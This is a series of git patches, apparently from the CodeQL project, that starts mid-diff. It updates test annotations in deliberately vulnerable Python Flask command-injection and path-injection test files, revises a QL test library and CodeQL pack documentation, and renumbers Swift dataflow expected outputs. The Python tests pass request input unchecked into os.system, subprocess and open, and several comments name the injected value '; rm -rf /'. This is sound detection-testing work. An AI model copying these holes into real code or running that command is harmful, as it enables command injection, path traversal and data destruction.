result=BAD` or `result=OK` annotation" and exists(DataFlow::Node sink | - exists(DataFlow::Configuration cfg | cfg.isSink(sink)) and + exists(DataFlow::Configuration cfg | cfg.isSink(sink) or cfg.isSink(sink, _)) and location = sink.getLocation() and element = prettyExpr(sink.asExpr()) and not any(DataFlow::Configuration config).hasFlow(_, sink) and not exists(FalseNegativeExpectation missingResult | - missingResult.getTag() = "flow" and + missingResult.getTag() = "result" and + missingResult.getValue() = "BAD" and missingResult.getLocation().getFile() = location.getFile() and missingResult.getLocation().getStartLine() = location.getStartLine() + ) and + not exists(GoodExpectation okResult | + okResult.getTag() = "result" and + okResult.getValue() = "OK" and + okResult.getLocation().getFile() = location.getFile() and + okResult.getLocation().getStartLine() = location.getStartLine() ) ) } diff --git a/python/ql/test/query-tests/Security/CWE-078-CommandInjection/command_injection.py b/python/ql/test/query-tests/Security/CWE-078-CommandInjection/command_injection.py index ef8cb221ea0..c969a1b1020 100644 --- a/python/ql/test/query-tests/Security/CWE-078-CommandInjection/command_injection.py +++ b/python/ql/test/query-tests/Security/CWE-078-CommandInjection/command_injection.py @@ -10,27 +10,27 @@ app = Flask(__name__) def command_injection1(): files = request.args.get('files', '') # Don't let files be `; rm -rf /` - os.system("ls " + files) # $flow="ImportMember, l:-8 -> BinaryExpr" + os.system("ls " + files) # $result=BAD @app.route("/command2") def command_injection2(): files = request.args.get('files', '') # Don't let files be `; rm -rf /` - subprocess.Popen("ls " + files, shell=True) # $flow="ImportMember, l:-15 -> BinaryExpr" + subprocess.Popen("ls " + files, shell=True) # $result=BAD @app.route("/command3") def first_arg_injection(): cmd = request.args.get('cmd', '') - subprocess.Popen([cmd, "param1"]) # $flow="ImportMember, l:-21 -> cmd" + subprocess.Popen([cmd, "param1"]) # $result=BAD @app.route("/other_cases") def others(): files = request.args.get('files', '') # Don't let files be `; rm -rf /` - os.popen("ls " + files) # $flow="ImportMember, l:-28 -> BinaryExpr" + os.popen("ls " + files) # $result=BAD @app.route("/multiple") @@ -38,8 +38,8 @@ def multiple(): command = request.args.get('command', '') # We should mark flow to both calls here, which conflicts with removing flow out of # a sink due to use-use flow. - os.system(command) # $flow="ImportMember, l:-36 -> command" - os.system(command) # $flow="ImportMember, l:-37 -> command" + os.system(command) # $result=BAD + os.system(command) # $result=BAD @app.route("/not-into-sink-impl") @@ -52,11 +52,11 @@ def not_into_sink_impl(): subprocess.call implementation: https://github.com/python/cpython/blob/fa7ce080175f65d678a7d5756c94f82887fc9803/Lib/subprocess.py#L341 """ command = request.args.get('command', '') - os.system(command) # $flow="ImportMember, l:-50 -> command" - os.popen(command) # $flow="ImportMember, l:-51 -> command" - subprocess.call(command) # $flow="ImportMember, l:-52 -> command" - subprocess.check_call(command) # $flow="ImportMember, l:-53 -> command" - subprocess.run(command) # $flow="ImportMember, l:-54 -> command" + os.system(command) # $result=BAD + os.popen(command) # $result=BAD + subprocess.call(command) # $result=BAD + subprocess.check_call(command) # $result=BAD + subprocess.run(command) # $result=BAD @app.route("/path-exists-not-sanitizer") @@ -70,11 +70,11 @@ def path_exists_not_sanitizer(): """ path = request.args.get('path', '') if os.path.exists(path): - os.system("ls " + path) # $flow="ImportMember, l:-68 -> BinaryExpr" + os.system("ls " + path) # $result=BAD @app.route("/restricted-characters") def restricted_characters(): path = request.args.get('path', '') if re.match(r'^[a-zA-Z0-9_-]+$', path): - os.system("ls " + path) # $SPURIOUS: flow="ImportMember, l:-75 -> BinaryExpr" + os.system("ls " + path) # $SPURIOUS: result=BAD From 03bd6cb414d066b85b00672966bb1fca3e365359 Mon Sep 17 00:00:00 2001 From: Rasmus Lerchedahl Petersen Date: Fri, 6 Jan 2023 11:21:35 +0100 Subject: [PATCH 115/381] python: Allow optional `result=OK` Also add a further test case --- .../dataflow/TestUtil/DataflowQueryTest.qll | 29 +++++++++++++---- .../DataflowQueryTest.expected | 2 ++ .../DataflowQueryTest.ql | 3 ++ .../flask_path_injection.py | 4 +-- .../CWE-022-PathInjection/path_injection.py | 32 +++++++++---------- .../Security/CWE-022-PathInjection/test.py | 10 +++--- .../CWE-022-PathInjection/test_chaining.py | 6 ++-- 7 files changed, 53 insertions(+), 33 deletions(-) create mode 100644 python/ql/test/query-tests/Security/CWE-022-PathInjection/DataflowQueryTest.expected create mode 100644 python/ql/test/query-tests/Security/CWE-022-PathInjection/DataflowQueryTest.ql diff --git a/python/ql/test/experimental/dataflow/TestUtil/DataflowQueryTest.qll b/python/ql/test/experimental/dataflow/TestUtil/DataflowQueryTest.qll index 0e6d6bf55bf..1c9259038bc 100644 --- a/python/ql/test/experimental/dataflow/TestUtil/DataflowQueryTest.qll +++ b/python/ql/test/experimental/dataflow/TestUtil/DataflowQueryTest.qll @@ -9,13 +9,27 @@ class DataFlowQueryTest extends InlineExpectationsTest { override string getARelevantTag() { result = "result" } override predicate hasActualResult(Location location, string element, string tag, string value) { - exists(DataFlow::Configuration cfg, DataFlow::Node fromNode, DataFlow::Node toNode | - cfg.hasFlow(fromNode, toNode) - | - location = toNode.getLocation() and + exists(DataFlow::Configuration cfg, DataFlow::Node sink | cfg.hasFlowTo(sink) | + location = sink.getLocation() and tag = "result" and value = "BAD" and - element = toNode.toString() + element = sink.toString() + ) + } + + // We allow annotating any sink with `result=OK` to signal + // safe sinks. + // Sometimes a line contains both an alert and a safe sink. + // In this situation, the annotation form `OK(safe sink)` + // can be useful. + override predicate hasOptionalResult(Location location, string element, string tag, string value) { + exists(DataFlow::Configuration cfg, DataFlow::Node sink | + cfg.isSink(sink) or cfg.isSink(sink, _) + | + location = sink.getLocation() and + tag = "result" and + value in ["OK", "OK(" + prettyNode(sink) + ")"] and + element = sink.toString() ) } } @@ -23,10 +37,11 @@ class DataFlowQueryTest extends InlineExpectationsTest { query predicate missingAnnotationOnSink(Location location, string error, string element) { error = "ERROR, you should add `# $ MISSING: result=BAD` or `result=OK` annotation" and exists(DataFlow::Node sink | + exists(sink.getLocation().getFile().getRelativePath()) and exists(DataFlow::Configuration cfg | cfg.isSink(sink) or cfg.isSink(sink, _)) and location = sink.getLocation() and element = prettyExpr(sink.asExpr()) and - not any(DataFlow::Configuration config).hasFlow(_, sink) and + not exists(DataFlow::Configuration cfg | cfg.hasFlowTo(sink)) and not exists(FalseNegativeExpectation missingResult | missingResult.getTag() = "result" and missingResult.getValue() = "BAD" and @@ -35,7 +50,7 @@ query predicate missingAnnotationOnSink(Location location, string error, string ) and not exists(GoodExpectation okResult | okResult.getTag() = "result" and - okResult.getValue() = "OK" and + okResult.getValue() in ["OK", "OK(" + prettyNode(sink) + ")"] and okResult.getLocation().getFile() = location.getFile() and okResult.getLocation().getStartLine() = location.getStartLine() ) diff --git a/python/ql/test/query-tests/Security/CWE-022-PathInjection/DataflowQueryTest.expected b/python/ql/test/query-tests/Security/CWE-022-PathInjection/DataflowQueryTest.expected new file mode 100644 index 00000000000..3875da4e143 --- /dev/null +++ b/python/ql/test/query-tests/Security/CWE-022-PathInjection/DataflowQueryTest.expected @@ -0,0 +1,2 @@ +missingAnnotationOnSink +failures diff --git a/python/ql/test/query-tests/Security/CWE-022-PathInjection/DataflowQueryTest.ql b/python/ql/test/query-tests/Security/CWE-022-PathInjection/DataflowQueryTest.ql new file mode 100644 index 00000000000..c78e5a7c8c6 --- /dev/null +++ b/python/ql/test/query-tests/Security/CWE-022-PathInjection/DataflowQueryTest.ql @@ -0,0 +1,3 @@ +import python +import experimental.dataflow.TestUtil.DataflowQueryTest +import semmle.python.security.dataflow.PathInjectionQuery diff --git a/python/ql/test/query-tests/Security/CWE-022-PathInjection/flask_path_injection.py b/python/ql/test/query-tests/Security/CWE-022-PathInjection/flask_path_injection.py index ee531fead46..f64d76a3b4d 100644 --- a/python/ql/test/query-tests/Security/CWE-022-PathInjection/flask_path_injection.py +++ b/python/ql/test/query-tests/Security/CWE-022-PathInjection/flask_path_injection.py @@ -10,7 +10,7 @@ STATIC_DIR = "/server/static/" def download_file(): filename = request.args.get('filename', '') # ok since `send_from_directory` ensure this stays within `STATIC_DIR` - return send_from_directory(STATIC_DIR, filename) # OK + return send_from_directory(STATIC_DIR, filename) # $result=OK # see https://flask.palletsprojects.com/en/1.1.x/api/#flask.send_from_directory @@ -18,4 +18,4 @@ def download_file(): def download_file(): dirname = request.args.get('dirname', '') filename = request.args.get('filename', '') - return send_from_directory(dirname, filename) # NOT OK + return send_from_directory(dirname, filename) # $result=BAD result=OK(filename) diff --git a/python/ql/test/query-tests/Security/CWE-022-PathInjection/path_injection.py b/python/ql/test/query-tests/Security/CWE-022-PathInjection/path_injection.py index 09c9fbcfbd1..39c17037480 100644 --- a/python/ql/test/query-tests/Security/CWE-022-PathInjection/path_injection.py +++ b/python/ql/test/query-tests/Security/CWE-022-PathInjection/path_injection.py @@ -10,7 +10,7 @@ STATIC_DIR = "/server/static/" @app.route("/path1") def path_injection(): filename = request.args.get('filename', '') - f = open(os.path.join(STATIC_DIR, filename)) # NOT OK + f = open(os.path.join(STATIC_DIR, filename)) # $result=BAD @app.route("/path2") @@ -18,7 +18,7 @@ def path_injection(): # Normalized, but not checked filename = request.args.get('filename', '') npath = os.path.normpath(os.path.join(STATIC_DIR, filename)) - f = open(npath) # NOT OK + f = open(npath) # $result=BAD @app.route("/path3") @@ -28,7 +28,7 @@ def unsafe_path_normpath(): npath = os.path.normpath(os.path.join(STATIC_DIR, filename)) if npath.startswith(STATIC_DIR): pass - f = open(npath) # NOT OK + f = open(npath) # $result=BAD @app.route("/path4") @@ -37,7 +37,7 @@ def safe_path_normpath(): filename = request.args.get('filename', '') npath = os.path.normpath(os.path.join(STATIC_DIR, filename)) if npath.startswith(STATIC_DIR): - f = open(npath) # OK + f = open(npath) # $result=OK @app.route("/path5") @@ -45,7 +45,7 @@ def unsafe_path_realpath(): # Normalized (by `realpath` that also follows symlinks), but not checked properly filename = request.args.get('filename', '') npath = os.path.realpath(os.path.join(STATIC_DIR, filename)) - f = open(npath) # NOT OK + f = open(npath) # $result=BAD @app.route("/path6") @@ -54,7 +54,7 @@ def safe_path_realpath(): filename = request.args.get('filename', '') npath = os.path.realpath(os.path.join(STATIC_DIR, filename)) if npath.startswith(STATIC_DIR): - f = open(npath) # OK + f = open(npath) # $result=OK @app.route("/path6") @@ -62,7 +62,7 @@ def unsafe_path_abspath(): # Normalized (by `abspath`), but not checked properly filename = request.args.get('filename', '') npath = os.path.abspath(os.path.join(STATIC_DIR, filename)) - f = open(npath) # NOT OK + f = open(npath) # $result=BAD @app.route("/path7") @@ -71,7 +71,7 @@ def safe_path_abspath(): filename = request.args.get('filename', '') npath = os.path.abspath(os.path.join(STATIC_DIR, filename)) if npath.startswith(STATIC_DIR): - f = open(npath) # OK + f = open(npath) # $result=OK @app.route("/abspath_tricky") @@ -84,14 +84,14 @@ def safe_path_abspath_tricky(): filename = request.args.get('filename', '') possibly_unsafe_path = os.path.join(STATIC_DIR, filename) if os.path.abspath(possibly_unsafe_path).startswith(STATIC_DIR): - f = open(possibly_unsafe_path) # OK + f = open(possibly_unsafe_path) # $SPURIOUS: result=BAD @app.route("/int-only/") def flask_int_only(foo_id): # This is OK, since the flask routing ensures that `foo_id` MUST be an integer. path = os.path.join(STATIC_DIR, foo_id) - f = open(path) # OK TODO: FP + f = open(path) # $spurious: result=BAD @app.route("/not-path/") @@ -99,7 +99,7 @@ def flask_not_path(foo): # On UNIX systems, this is OK, since without being marked as ``, flask # routing ensures that `foo` cannot contain forward slashes (not by using %2F either). path = os.path.join(STATIC_DIR, foo) - f = open(path) # OK if only running on UNIX systems, NOT OK if could be running on windows + f = open(path) # $result=BAD // OK if only running on UNIX systems, NOT OK if could be running on windows @app.route("/no-dot-dot") @@ -110,7 +110,7 @@ def no_dot_dot(): # handle if `filename` is an absolute path if '../' in path: return "not this time" - f = open(path) # NOT OK + f = open(path) # $result=BAD @app.route("/no-dot-dot-with-prefix") @@ -121,7 +121,7 @@ def no_dot_dot_with_prefix(): # Therefore, for UNIX-only programs, the `../` check is enough to stop path injections. if '../' in path: return "not this time" - f = open(path) # OK if only running on UNIX systems, NOT OK if could be running on windows + f = open(path) # $result=BAD // OK if only running on UNIX systems, NOT OK if could be running on windows @app.route("/replace-slash") @@ -129,7 +129,7 @@ def replace_slash(): filename = request.args.get('filename', '') path = os.path.join(STATIC_DIR, filename) sanitized = path.replace("/", "_") - f = open(sanitized) # OK if only running on UNIX systems, NOT OK if could be running on windows + f = open(sanitized) # $result=BAD // OK if only running on UNIX systems, NOT OK if could be running on windows @app.route("/stackoverflow-solution") @@ -139,7 +139,7 @@ def stackoverflow_solution(): path = os.path.join(STATIC_DIR, filename) if os.path.commonprefix((os.path.realpath(path), STATIC_DIR)) != STATIC_DIR: return "not this time" - f = open(path) # OK TODO: FP + f = open(path) # $SPURIOUS: result=BAD SAFE_FILES = ['foo', 'bar', 'baz'] @@ -149,4 +149,4 @@ def safe_set_of_files(): filename = request.args.get('filename', '') if filename in SAFE_FILES: path = os.path.join(STATIC_DIR, filename) - f = open(path) # OK TODO: FP + f = open(path) # $SPURIOUS: result=BAD diff --git a/python/ql/test/query-tests/Security/CWE-022-PathInjection/test.py b/python/ql/test/query-tests/Security/CWE-022-PathInjection/test.py index a64241db099..7200cd78f45 100644 --- a/python/ql/test/query-tests/Security/CWE-022-PathInjection/test.py +++ b/python/ql/test/query-tests/Security/CWE-022-PathInjection/test.py @@ -16,21 +16,21 @@ def normalize(x): @app.route("/path") def simple(): x = source() - open(x) # NOT OK + open(x) # $result=BAD @app.route("/path") def normalization(): x = source() y = normalize(x) - open(y) # NOT OK + open(y) # $result=BAD @app.route("/path") def check(): x = source() if x.startswith("subfolder/"): - open(x) # NOT OK + open(x) # $result=BAD @app.route("/path") @@ -38,7 +38,7 @@ def normalize_then_check(): x = source() y = normalize(x) if y.startswith("subfolder/"): - open(y) # OK + open(y) # $result=OK @app.route("/path") @@ -46,4 +46,4 @@ def check_then_normalize(): x = source() if x.startswith("subfolder/"): y = normalize(x) - open(y) # NOT OK + open(y) # $result=BAD diff --git a/python/ql/test/query-tests/Security/CWE-022-PathInjection/test_chaining.py b/python/ql/test/query-tests/Security/CWE-022-PathInjection/test_chaining.py index ad1126e0e65..05d8f2620b1 100644 --- a/python/ql/test/query-tests/Security/CWE-022-PathInjection/test_chaining.py +++ b/python/ql/test/query-tests/Security/CWE-022-PathInjection/test_chaining.py @@ -20,7 +20,7 @@ def normalize_then_check(): x = source() y = normalize(x) # <--- this call... if y.startswith("subfolder/"): - open(y) # OK + open(y) # $result=OK @app.route("/path") @@ -29,7 +29,7 @@ def normalize_check_normalize(): y = normalize(x) # (...or this call...) if y.startswith("subfolder/"): z = normalize(y) # <--- ...can jump to here, resulting in FP - open(z) # OK + open(z) # $result=OK # The problem does not manifest if we simply define an alias @@ -42,4 +42,4 @@ def normalize_check_normalize_alias(): y = normpath(x) if y.startswith("subfolder/"): z = normpath(y) - open(z) # OK + open(z) # $result=OK From d68cfc7d4f90b83c337e03eec56f4080e3903456 Mon Sep 17 00:00:00 2001 From: Sarita Iyer <66540150+saritai@users.noreply.github.com> Date: Fri, 6 Jan 2023 11:17:02 -0500 Subject: [PATCH 116/381] codeql pack compatibility docs --- docs/codeql/codeql-cli/about-codeql-packs.rst | 14 ++++++- ...creating-and-working-with-codeql-packs.rst | 16 +++++++- .../publishing-and-using-codeql-packs.rst | 39 +++++++++++++++++++ 3 files changed, 65 insertions(+), 4 deletions(-) diff --git a/docs/codeql/codeql-cli/about-codeql-packs.rst b/docs/codeql/codeql-cli/about-codeql-packs.rst index 68f67cb7ba9..8cfe072f2c9 100644 --- a/docs/codeql/codeql-cli/about-codeql-packs.rst +++ b/docs/codeql/codeql-cli/about-codeql-packs.rst @@ -9,8 +9,8 @@ CodeQL packs are used to create, share, depend on, and run CodeQL queries and li There are two types of CodeQL packs: query packs and library packs. -* Query packs are designed to be run. When a query pack is published, the bundle includes all the transitive dependencies and a compilation cache. This ensures consistent and efficient execution of the queries in the pack. -* Library packs are designed to be used by query packs (or other library packs) and do not contain queries themselves. The libraries are not compiled and there is no compilation cache included when the pack is published. +* Query packs are designed to be run. When a query pack is published, the bundle includes all the transitive dependencies and pre-compiled representations of each query, in addition to the query sources. This ensures consistent and efficient execution of the queries in the pack. +* Library packs are designed to be used by query packs (or other library packs) and do not contain queries themselves. The libraries are not compiled separately. You can use the package management commands in the CodeQL CLI to create CodeQL packs, add dependencies to packs, and install or update dependencies. For more information, see ":ref:`Creating and working with CodeQL packs `." You can also publish and download CodeQL packs using the CodeQL CLI. For more information, see ":doc:`Publishing and using CodeQL packs `." @@ -31,6 +31,16 @@ The other files and directories within the pack should be logically organized. F - Queries for specific products, libraries, and frameworks are organized into their own top-level directories. +About published packs +-------------------------- + +When a pack is published for use in analyses, the ``codeql pack create`` or ``codeql pack publish`` command verifies that the content is complete and also adds some additional pieces of content to it: + +* For query packs, a copy of each of the library packs it depends on, in the precise versions it has been developed with. Users of the query pack won't need to download these library packs separately. +* For query packs, precompiled representations of each of the queries. These are faster to execute than it would be to compile the QL source for the query at each analysis. + +Most of this data is located in a directory named ``.codeql`` in the published pack, but precompiled queries are in files with a ``.qlx`` suffix next to the ``.ql`` source for each query. When analyzing a database with a query from a published pack, CodeQL will load these files instead of the ``.ql`` source. If you need to modify the content of a *published* pack, be sure to remove all of the ``.qlx`` files, since they may prevent modifications in the ``.ql`` files from taking effect. + About ``qlpack.yml`` files -------------------------- diff --git a/docs/codeql/codeql-cli/creating-and-working-with-codeql-packs.rst b/docs/codeql/codeql-cli/creating-and-working-with-codeql-packs.rst index 7d2001dded5..f19788f1afc 100644 --- a/docs/codeql/codeql-cli/creating-and-working-with-codeql-packs.rst +++ b/docs/codeql/codeql-cli/creating-and-working-with-codeql-packs.rst @@ -14,11 +14,13 @@ With CodeQL packs and the package management commands in the CodeQL CLI, you can There are two types of CodeQL packs: query packs and library packs. -* Query packs are designed to be run. When a query pack is published, the bundle includes all the transitive dependencies and a compilation cache. This ensures consistent and efficient execution of the queries in the pack. -* Library packs are designed to be used by query packs (or other library packs) and do not contain queries themselves. The libraries are not compiled and there is no compilation cache included when the pack is published. +* Query packs are designed to be run. When a query pack is published, the bundle includes all the transitive dependencies and pre-compiled representations of each query, in addition to the query sources. This ensures consistent and efficient execution of the queries in the pack. +* Library packs are designed to be used by query packs (or other library packs) and do not contain queries themselves. The libraries are not compiled separately. You can use the ``pack`` command in the CodeQL CLI to create CodeQL packs, add dependencies to packs, and install or update dependencies. You can also publish and download CodeQL packs using the ``pack`` command. For more information, see ":doc:`Publishing and using CodeQL packs `." +For more information about compatibility between published query packs and different CodeQL releases, see ":ref:`About CodeQL pack compatibility `." + Creating a CodeQL pack ---------------------- You can create a CodeQL pack by running the following command from the checkout root of your project: @@ -81,3 +83,13 @@ This command downloads all dependencies to the shared cache on the local disk. By default ``codeql pack install`` will install dependencies from the Container registry on GitHub.com. You can install dependencies from a GitHub Enterprise Server Container registry by creating a ``qlconfig.yml`` file. For more information, see ":doc:`Publishing and using CodeQL packs `." + +Customizing a downloaded CodeQL pack +--------------------------------------------------- + +The recommended way to experiment with changes to a pack is to clone the repository containing its source code. + +If no source respository is available and you need to base modifications on a pack downloaded from the Container registry, be aware that these packs are not intended to be modified or customized after downloading, and their format may change in the future without much notice. We recommend taking the following steps after downloading a pack if you need to modify the content: + +- Change the pack *name* in ``qlpack.yml`` so you avoid confusion with results from the unmodified pack. +- Remove all files named ``*.qlx`` anywhere in the unpacked directory structure. These files contain precompiled versions of the queries, and in some situations CodeQL will use them in preference to the QL source you have modified. \ No newline at end of file diff --git a/docs/codeql/codeql-cli/publishing-and-using-codeql-packs.rst b/docs/codeql/codeql-cli/publishing-and-using-codeql-packs.rst index a91bc570768..93b27ea94aa 100644 --- a/docs/codeql/codeql-cli/publishing-and-using-codeql-packs.rst +++ b/docs/codeql/codeql-cli/publishing-and-using-codeql-packs.rst @@ -53,6 +53,9 @@ To run a pack that someone else has created, you must first download it by runni This command accepts arguments for multiple packs. +If you write scripts that specify a particular version number of a query pack to download, keep in mind that when you update your version of CodeQL to a newer one, you may also need to switch to a newer version of the query pack. Newer versions of CodeQL *may* provide +degraded performance when used with query packs that have been pinned to a very old version. For more information, see ":ref:`About CodeQL pack compatibility `." + Using a CodeQL pack to analyze a CodeQL database ------------------------------------------------ @@ -74,6 +77,42 @@ The ``analyze`` command will run the default suite of any specified CodeQL packs codeql analyze / / +.. pull-quote:: + + Note + + The ``codeql pack download`` command stores the pack it downloads in an internal location that is not intended for local modification. Unexpected (and hard to troubleshoot) behavior may result if the pack is modified after downloading. For more information about customizing packs, see ":ref:`Creating and working with CodeQL packs `." + +About CodeQL pack compatibility +------------------------------- + +When a query pack is published, it includes pre-compiled representations of all the queries in it. These pre-compiled queries are generally much faster to execute than it is to compile the QL source from scratch during the analysis. However, the pre-compiled queries also depend on certain internals of the QL evaluator, so if the version of CodeQL that performs the analysis is too different from the version that ran ``codeql pack publish``, it may be necessary to compile the queries from source instead during analysis. The recompilation happens automatically and will not affect the *results* of the analysis, but it can make the +analysis significantly slower. + +It can generally be assumed that if a pack is published with one release of CodeQL, the precompiled queries in it can be used directly by *later* releases of CodeQL, as long as there is no more than 6 months between the release dates. We will make reasonable efforts to keep new releases compatible for longer than that, but make no promises. + +It can also be assumed that a pack published by the *latest* public release of CodeQL will be useable by the version of CodeQL that is used by code scanning and GitHub Actions, even though that is often a slightly older release. + +As an exception to the above, packs published with versions of CodeQL *earlier than 2.12.0* are not compatible with any earlier or later versions. These old versions did not write pre-compiled queries in a format that supported compatibility between releases. Packs published by these versions can still be *used* by newer versions, but the analysis will be slower because the queries have to be recompiled first. + +As a user of a published query pack, you can check that the CodeQL makes use of the precompiled queries in it by inspecting the terminal output from an analysis runs that uses the query pack. If it contains lines looking like the following, then the precompiled queries were used successfully: + +:: + + [42/108] Loaded /long/path/to/query/Filename.qlx. + +However, if they instead look like the following, then usage of the precompiled queries failed: + +:: + Compiling query plan for /long/path/to/query/Filename.ql. + [42/108 comp 25s] Compiled /long/path/to/query/Filename.ql. + +The results of the analysis will still be good in this case, but to get optimal performance you may need to upgrade to a newer version of the CodeQL CLI and/or of the query pack. + +If you publish query packs on the Container registry on GitHub.com for others to use, we recommend that you use a recent release of CodeQL to run ``codeql pack publish``, and that you publish a fresh version of your pack with an updated CodeQL version before the version you used turns 6 months old. That way you can ensure that users of your pack who keep *their* CodeQL up to date will benefit from the pre-compiled queries in your pack. + +If you publish query packs with the intention of using them on a GitHub Enterprise Server installation that uses its bundled CodeQL binaries, use the same CodeQL version to run ``codeql pack publish``. Newer versions might produce pre-compiled queries that the one in GitHub Enterprise Server may not recognize. Your GitHub Enterprise Server administrator may choose to upgrade to a newer version of CodeQL periodically. If so, follow their lead. + .. _working-with-codeql-packs-on-ghes: Working with CodeQL packs on GitHub Enterprise Server From a9867a266e9cf4b789479e8b6ca55f567b2f2dfc Mon Sep 17 00:00:00 2001 From: Sarita Iyer <66540150+saritai@users.noreply.github.com> Date: Fri, 6 Jan 2023 11:50:07 -0500 Subject: [PATCH 117/381] fixed link --- docs/codeql/codeql-cli/publishing-and-using-codeql-packs.rst | 2 ++ 1 file changed, 2 insertions(+) diff --git a/docs/codeql/codeql-cli/publishing-and-using-codeql-packs.rst b/docs/codeql/codeql-cli/publishing-and-using-codeql-packs.rst index 93b27ea94aa..afa851e4185 100644 --- a/docs/codeql/codeql-cli/publishing-and-using-codeql-packs.rst +++ b/docs/codeql/codeql-cli/publishing-and-using-codeql-packs.rst @@ -83,6 +83,8 @@ The ``analyze`` command will run the default suite of any specified CodeQL packs The ``codeql pack download`` command stores the pack it downloads in an internal location that is not intended for local modification. Unexpected (and hard to troubleshoot) behavior may result if the pack is modified after downloading. For more information about customizing packs, see ":ref:`Creating and working with CodeQL packs `." +.. _about-codeql-pack-compatibility: + About CodeQL pack compatibility ------------------------------- From 04f87a26a951e39e5f73433c41b60e0f6e64bee7 Mon Sep 17 00:00:00 2001 From: Geoffrey White <40627776+geoffw0@users.noreply.github.com> Date: Fri, 6 Jan 2023 16:52:47 +0000 Subject: [PATCH 118/381] Swift: Test layout change. --- .../dataflow/dataflow/DataFlow.expected | 84 +++++++++---------- .../dataflow/dataflow/LocalFlow.expected | 82 +++++++++--------- .../dataflow/dataflow/test.swift | 45 ++++++++-- 3 files changed, 120 insertions(+), 91 deletions(-) diff --git a/swift/ql/test/library-tests/dataflow/dataflow/DataFlow.expected b/swift/ql/test/library-tests/dataflow/dataflow/DataFlow.expected index 1277d30cdc2..6a7fd737998 100644 --- a/swift/ql/test/library-tests/dataflow/dataflow/DataFlow.expected +++ b/swift/ql/test/library-tests/dataflow/dataflow/DataFlow.expected @@ -114,22 +114,22 @@ edges | test.swift:271:15:271:25 | call to signum() : | test.swift:271:15:271:25 | OptionalEvaluationExpr | | test.swift:280:31:280:38 | call to source() : | test.swift:280:15:280:38 | ... ? ... : ... | | test.swift:282:31:282:38 | call to source() : | test.swift:282:15:282:38 | ... ? ... : ... | -| test.swift:302:14:302:26 | (...) [Tuple element at index 1] : | test.swift:306:15:306:15 | t1 [Tuple element at index 1] : | -| test.swift:302:18:302:25 | call to source() : | test.swift:302:14:302:26 | (...) [Tuple element at index 1] : | -| test.swift:306:15:306:15 | t1 [Tuple element at index 1] : | test.swift:306:15:306:18 | .1 | -| test.swift:314:5:314:5 | [post] t1 [Tuple element at index 0] : | test.swift:317:15:317:15 | t1 [Tuple element at index 0] : | -| test.swift:314:12:314:19 | call to source() : | test.swift:314:5:314:5 | [post] t1 [Tuple element at index 0] : | -| test.swift:317:15:317:15 | t1 [Tuple element at index 0] : | test.swift:317:15:317:18 | .0 | -| test.swift:322:14:322:45 | (...) [Tuple element at index 0] : | test.swift:327:15:327:15 | t1 [Tuple element at index 0] : | -| test.swift:322:14:322:45 | (...) [Tuple element at index 0] : | test.swift:331:15:331:15 | t2 [Tuple element at index 0] : | -| test.swift:322:14:322:45 | (...) [Tuple element at index 1] : | test.swift:328:15:328:15 | t1 [Tuple element at index 1] : | -| test.swift:322:14:322:45 | (...) [Tuple element at index 1] : | test.swift:332:15:332:15 | t2 [Tuple element at index 1] : | -| test.swift:322:18:322:25 | call to source() : | test.swift:322:14:322:45 | (...) [Tuple element at index 0] : | -| test.swift:322:31:322:38 | call to source() : | test.swift:322:14:322:45 | (...) [Tuple element at index 1] : | -| test.swift:327:15:327:15 | t1 [Tuple element at index 0] : | test.swift:327:15:327:18 | .0 | -| test.swift:328:15:328:15 | t1 [Tuple element at index 1] : | test.swift:328:15:328:18 | .1 | -| test.swift:331:15:331:15 | t2 [Tuple element at index 0] : | test.swift:331:15:331:18 | .0 | -| test.swift:332:15:332:15 | t2 [Tuple element at index 1] : | test.swift:332:15:332:18 | .1 | +| test.swift:331:14:331:26 | (...) [Tuple element at index 1] : | test.swift:335:15:335:15 | t1 [Tuple element at index 1] : | +| test.swift:331:18:331:25 | call to source() : | test.swift:331:14:331:26 | (...) [Tuple element at index 1] : | +| test.swift:335:15:335:15 | t1 [Tuple element at index 1] : | test.swift:335:15:335:18 | .1 | +| test.swift:343:5:343:5 | [post] t1 [Tuple element at index 0] : | test.swift:346:15:346:15 | t1 [Tuple element at index 0] : | +| test.swift:343:12:343:19 | call to source() : | test.swift:343:5:343:5 | [post] t1 [Tuple element at index 0] : | +| test.swift:346:15:346:15 | t1 [Tuple element at index 0] : | test.swift:346:15:346:18 | .0 | +| test.swift:351:14:351:45 | (...) [Tuple element at index 0] : | test.swift:356:15:356:15 | t1 [Tuple element at index 0] : | +| test.swift:351:14:351:45 | (...) [Tuple element at index 0] : | test.swift:360:15:360:15 | t2 [Tuple element at index 0] : | +| test.swift:351:14:351:45 | (...) [Tuple element at index 1] : | test.swift:357:15:357:15 | t1 [Tuple element at index 1] : | +| test.swift:351:14:351:45 | (...) [Tuple element at index 1] : | test.swift:361:15:361:15 | t2 [Tuple element at index 1] : | +| test.swift:351:18:351:25 | call to source() : | test.swift:351:14:351:45 | (...) [Tuple element at index 0] : | +| test.swift:351:31:351:38 | call to source() : | test.swift:351:14:351:45 | (...) [Tuple element at index 1] : | +| test.swift:356:15:356:15 | t1 [Tuple element at index 0] : | test.swift:356:15:356:18 | .0 | +| test.swift:357:15:357:15 | t1 [Tuple element at index 1] : | test.swift:357:15:357:18 | .1 | +| test.swift:360:15:360:15 | t2 [Tuple element at index 0] : | test.swift:360:15:360:18 | .0 | +| test.swift:361:15:361:15 | t2 [Tuple element at index 1] : | test.swift:361:15:361:18 | .1 | nodes | file://:0:0:0:0 | .a [x] : | semmle.label | .a [x] : | | file://:0:0:0:0 | .x : | semmle.label | .x : | @@ -258,26 +258,26 @@ nodes | test.swift:280:31:280:38 | call to source() : | semmle.label | call to source() : | | test.swift:282:15:282:38 | ... ? ... : ... | semmle.label | ... ? ... : ... | | test.swift:282:31:282:38 | call to source() : | semmle.label | call to source() : | -| test.swift:302:14:302:26 | (...) [Tuple element at index 1] : | semmle.label | (...) [Tuple element at index 1] : | -| test.swift:302:18:302:25 | call to source() : | semmle.label | call to source() : | -| test.swift:306:15:306:15 | t1 [Tuple element at index 1] : | semmle.label | t1 [Tuple element at index 1] : | -| test.swift:306:15:306:18 | .1 | semmle.label | .1 | -| test.swift:314:5:314:5 | [post] t1 [Tuple element at index 0] : | semmle.label | [post] t1 [Tuple element at index 0] : | -| test.swift:314:12:314:19 | call to source() : | semmle.label | call to source() : | -| test.swift:317:15:317:15 | t1 [Tuple element at index 0] : | semmle.label | t1 [Tuple element at index 0] : | -| test.swift:317:15:317:18 | .0 | semmle.label | .0 | -| test.swift:322:14:322:45 | (...) [Tuple element at index 0] : | semmle.label | (...) [Tuple element at index 0] : | -| test.swift:322:14:322:45 | (...) 